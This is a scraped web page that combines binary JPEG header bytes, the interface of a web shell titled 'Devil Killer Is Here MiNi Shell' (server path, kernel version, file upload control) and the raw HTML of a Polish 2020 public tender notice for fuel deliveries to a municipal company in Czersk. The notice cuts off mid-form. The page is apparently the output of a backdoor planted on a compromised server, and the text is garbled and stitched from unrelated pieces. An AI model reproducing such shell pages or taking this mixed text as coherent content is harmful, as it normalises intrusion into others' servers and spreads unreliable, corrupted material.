JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200429/535648-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 535648-N-2020 z dnia 2020-04-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Usług Komunalnych Spółka z o.o. w Czersku</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Usług Komunalnych Spółka z o.o. w Czersku</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">77128559200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kilińskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">89-650</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Czersk</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">52 398 43 80</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">prezeszuk@wp.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">52 395 42 22</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zuk-czersk.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Spółka z o. o.</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zuk-czersk.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej, za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2018 r. poz. 2188 z późn. zm.), osobiście lub za pośrednicwem posłańca.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zakład Usług Komunalnych Sp. z o. o., ul. Kilińskiego 15, 89-650 Czersk</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">2/PN/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o.1)	Zakup paliw płynnych realizowany będzie sukcesywnie w okresie od 01.07.2020 r. do 30.06.2022 r., w miarę pojawiających się potrzeb Zamawiającego.2)	Wykonawca usługi umożliwi regulowanie należności w formie bezgotówkowej.3)	Podana niżej ilość paliwa określona została szacunkowo, a jej rzeczywista wielkość będzie wynikała z aktualnych potrzeb Zamawiającego. Sprzedawcy nie przysługuje roszczenie z powodu zmniejszenia zapotrzebowania na paliwa Zamawiającego.4)	Paliwo sprzedawane Zamawiającemu powinno spełniać wymagania jakościowe określonew Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. 2015 poz. 1680).5)	CZĘŚĆ 1: Dostawa oleju napędowego do zbiorników pojazdów Zamawiającego1.	SPOSÓB DOSTAWYDostawa oleju napędowego odbywać się będzie poprzez tankowanie pojazdów oraz kanistrów z przeznaczeniem do pojazdów i sprzętu, będących własnością Zamawiającego z dystrybutorów (odmierzaczy z aktualną legalizacją) Wykonawcy. Uwaga: Sprzedawca zobowiązany jest do umożliwienia odbioru paliwa na terenie miasta Czersk lub w odległości do 3 km od granic miasta.2.	WYMAGANIA DLA PALIWAOlej napędowy musi spełniać następujące wymagania:a)	Ze względu na właściwości niskotemperaturowe rozróżnia się trzy gatunki oleju napędowego odpowiadające paliwom klimatu umiarkowanego, tj. letni, przejściowy i zimowy. Skład paliwa powinien być dostosowany do odpowiedniej pory roku.b)	Olej napędowy musi być czysty mikrobiologicznie i musi być odporny w okresie całego roku na ewentualne skażenia biologiczne w zbiornikach i instalacji stacji paliw i pojazdów.c)	ON nie może zawierać dodatków metalicznych na bazie manganu, w tym trikarbonylku (metylocyklopentadieno) manganowego (MMT).3.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa z dystrybutora. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku czynności zakupu paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę, numer rejestracyjny pojazdu, ilość i rodzaj pobranego paliwa oraz podpis kierowcy. c)	Zamawiający dopuszcza, aby potwierdzenie zakupu paliwa następowało za pomocą karty paliwowej po zatwierdzeniu kodem PIN, z zastrzeżeniem, że każdy wskazany przez Zamawiającego pracownik otrzyma bezpłatnie indywidualną kartę paliwową wraz z unikalnym kodem PIN. Zamawiający wymaga, aby przy realizacji tankowania za pomocą karty paliwowej pracownik ZUK Sp. z o. o. otrzymał każdorazowo potwierdzenie transakcji. d)	Karty paliwowe wystawiane są i dostarczone do Zamawiającego na koszt Wykonawcy, przewidywana ilość kart w trakcie trwania umowy do 75 sztuk (karty nowe, karty wymienne - na skutek zagubienia, kradzieży, zmiany dotychczasowych danych itp.). 4.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie okresowych faktur zbiorczych. Do każdej zbiorczej faktury Sprzedawca dołączy szczegółowe zestawienie transakcji dokonanych w danym okresie. Zestawienie winno zawierać:a)	datę zakupu,b)	nr rejestracyjny pojazdu,c)	imię i nazwisko kierowcy,d)	ilość i rodzaj tankowanego paliwa.Sprzedaż paliw dokonywana będzie według cennika cen detalicznych stacji paliw Wykonawcy obowiązującego w dniu odbioru paliw z każdorazowym uwzględnieniem przysługującego Zamawiającemu rabatu kwotowego.5.	ILOŚĆSzacunkowa ilość zamawianego paliwa:a)	olej napędowy - około 30.000 litrów 6)	CZĘŚĆ 2: Dostawa benzyny bezołowiowej do zbiorników pojazdów Zamawiającego1.	SPOSÓB DOSTAWYDostawa benzyny bezołowiowej odbywać się będzie poprzez tankowanie pojazdów oraz kanistrów z przeznaczeniem do pojazdów i sprzętu, będących własnością ZUK Sp. z o. o. z dystrybutorów (odmierzaczy z aktualną legalizacją) Sprzedawcy. Uwaga: Sprzedawca zobowiązany jest do umożliwienia odbioru paliwa na terenie miasta Czersk lub w odległości do 3 km od granic miasta.2.	WYMAGANIA DLA PALIWABenzyna musi spełniać następujące wymagania:a)	Ze względu na parametry lotnościowe rozróżnia się trzy gatunki benzyny odpowiadające paliwom klimatu umiarkowanego, tj. letni, przejściowy i zimowy. Skład paliwa powinien być dostosowany do odpowiedniej pory roku.b)	Benzyna musi być czysta mikrobiologicznie i musi być odporny w okresie całego roku na ewentualne skażenia biologiczne w zbiornikach i instalacji stacji paliw i pojazdów.3.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa z dystrybutora. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku czynności zakupu paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę, numer rejestracyjny pojazdu, ilość i rodzaj pobranego paliwa oraz podpis kierowcy. Zamawiający dopuszcza, aby potwierdzenie zakupu paliwa następowało za pomocą karty paliwowej po zatwierdzeniu kodem PIN, z zastrzeżeniem, że każdy wskazany przez Zamawiającego pracownik otrzyma bezpłatnie indywidualną kartę paliwową wraz z unikalnym kodem PIN. Zamawiający wymaga, aby przy realizacjitankowania za pomocą karty paliwowej pracownik ZUK Sp. z o. o. otrzymał każdorazowo potwierdzenie transakcji. Karty paliwowe wystawiane są i dostarczone do Zamawiającego na koszt Wykonawcy, przewidywana ilość kart w trakcie trwania umowy do 75 sztuk (karty nowe, karty wymienne - na skutek zagubienia, kradzieży, zmiany dotychczasowych danych itp.).4.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie okresowych faktur zbiorczych. Do każdej zbiorczej faktury Sprzedawca dołączy szczegółowe zestawienie transakcji dokonanych w danym okresie. Zestawienie winno zawierać:a) datę zakupu,b)	nr rejestracyjny pojazdu,c)	imię i nazwisko kierowcy,d)	ilość i rodzaj tankowanego paliwa.Sprzedaż paliw dokonywana będzie według cennika cen detalicznych stacji paliw Wykonawcy obowiązującego w dniu odbioru paliw z każdorazowym uwzględnieniem przysługującego Zamawiającemu rabatu kwotowego.5.	ILOŚĆSzacunkowa ilość zamawianego paliwa:a)	benzyna bezołowiowa 95 - około 2.000 litrów7)	CZĘŚĆ 3: Dostawa oleju napędowego do zbiornika naziemnego w siedzibie Zamawiającego1.	SPOSÓB DOSTAWYa)	Dostawa oleju napędowego będzie realizowana poprzez uzupełnienie stanu paliwa zbiornika naziemnego znajdującego się w siedzibie Spółki. b)	Jednorazowo uzupełniana będzie pojemność od 500 l. do 5000 l. Sprzedawca zrealizuje dostawę w ciągu 48 godzin od momentu zgłoszenia telefonicznego takiej potrzeby przez Zamawiającego. c)	Sukcesywne dostawy paliw będą realizowane transportem zorganizowanym przez Wykonawcę na jego koszt i odpowiedzialność, według aktualnych potrzeb Zamawiającego.d)	Koszt transportu paliwa zawarty jest w cenie ofertowej.e)	Olej napędowy należy dostarczać autocysternami dysponowanymi przez Wykonawcę na jego koszt do zbiornika naziemnego Zamawiającego zlokalizowanego w Czersku ul. Kilińskiego 15 w godzinach 7:00 – 15:00. Cysterna musi być wyposażona w zawór do pobierania próbek paliwa.2.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku dostarczenia paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę i godzinę dostawy, ilość i rodzaj dostarczonego paliwa oraz podpis pracownika.3.	ROZLICZENIEa)	Oferowana cena netto 1 litra oleju napędowego winna zawierać łącznie cenę oleju napędowego wraz z kosztami transportu do magazynu Zamawiającego.b)	Podstawą sporządzenia oferty jest upust (lub marża) wyrażony w % stosunku do uśrednionej ceny netto 1.000 l. oleju napędowego (Ekodiesel) w temperaturze 15°C publikowanej przez PKN Orlen na dzień składania oferty.c)	Zaoferowany procentowy upust (lub marża) jest niezmienny przez cały okres trwania umowy.d)	Rozliczenie dostaw nastąpi na podstawie faktury wystawianej po dokonaniu dostawy. Sposób płatności przelew 14 dni. Do każdej faktury Sprzedawca dołączy szczegółowe zestawienie, które winno zawierać kserokopię certyfikatu potwierdzającego, jakość oleju napędowego potwierdzoną za zgodność z oryginałem.4.	ILOŚĆSzacunkowa ilość zamawianego oleju napędowego: około 150.000 litrów.8)	CZĘŚĆ 4: Dostawa oleju opałowego do zbiornika w kotłowni w siedzibie Zamawiającego1.	SPOSÓB DOSTAWYa)	Dostawa oleju opałowego będzie realizowana poprzez uzupełnienie stanu paliwa zbiornika kotłowni olejowej znajdującej się w siedzibie Spółki. b)	Jednorazowe uzupełnienie będzie o pojemności 1.000 l. Sprzedawca zrealizuje dostawę w ciągu 48 godzin od momentu zgłoszenia telefonicznego takiej potrzeby przez Zamawiającego. c)	Koszt transportu paliwa zawarty jest w cenie ofertowej.2.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa. b)	Wymagane jest potwierdzenie przez pracownika ZUK Sp. z o. o. na odpowiednim druku dostarczenia paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę i godzinę dostawy, ilość i rodzaj dostarczonego paliwa oraz podpis pracownika.3.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie faktury wystawianej po dokonaniu dostawy. Do każdej faktury Sprzedawca dołączy szczegółowe zestawienie, które winno zawierać:a)	miejsce i datę zakupu,b)	ilość pobranego oleju opałowego, c)	kserokopię certyfikatu potwierdzającego jakość oleju opałowego potwierdzoną za zgodność z oryginałem.4.	ILOŚĆSzacunkowa ilość zamawianego oleju opałowego: około 8.500 litrów</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">09134100-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09132100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09135100-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data 